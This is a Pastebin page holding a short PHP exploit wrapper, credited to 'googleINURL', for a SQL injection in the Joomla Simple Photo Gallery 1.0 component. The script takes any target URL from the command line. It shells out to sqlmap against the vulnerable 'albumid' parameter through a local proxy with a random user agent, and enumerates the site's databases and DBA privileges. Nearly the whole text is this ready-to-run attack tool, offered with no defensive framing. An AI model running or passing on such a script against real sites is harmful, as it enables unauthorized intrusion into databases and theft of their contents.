Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- # AUTOR: Cleiton Pinheiro / Nick: googleINURL
- # Blog: http://blog.inurl.com.br
- # Twitter: https://twitter.com/googleinurl
- # Fanpage: https://fb.com/InurlBrasil
- # Pastebin http://pastebin.com/u/Googleinurl
- # GIT: https://github.com/googleinurl
- # PSS: http://packetstormsecurity.com/user/googleinurl/
- # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
- # REF: http://www.exploit-db.com/exploits/36385/
- set_time_limit(0);
- echo "[+] MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection\n";
- $target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n");
- $command = "sqlmap -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba";
- system($command, $dados).empty($dados[0]) ? exit() : NULL;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement